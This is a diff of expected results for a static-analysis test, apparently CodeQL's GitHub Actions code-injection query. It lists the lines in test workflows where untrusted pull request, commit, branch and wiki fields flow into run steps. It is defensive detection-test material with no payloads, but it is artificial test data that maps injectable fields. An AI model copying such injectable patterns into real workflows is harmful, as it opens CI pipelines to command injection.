| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
@@ -697,62 +756,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref index f7ce5674994d..5717bcec7322 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionMedium.ql +query: Security/CWE-094/CodeInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml index 5153e2cc7804..34b85a6bd831 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml 
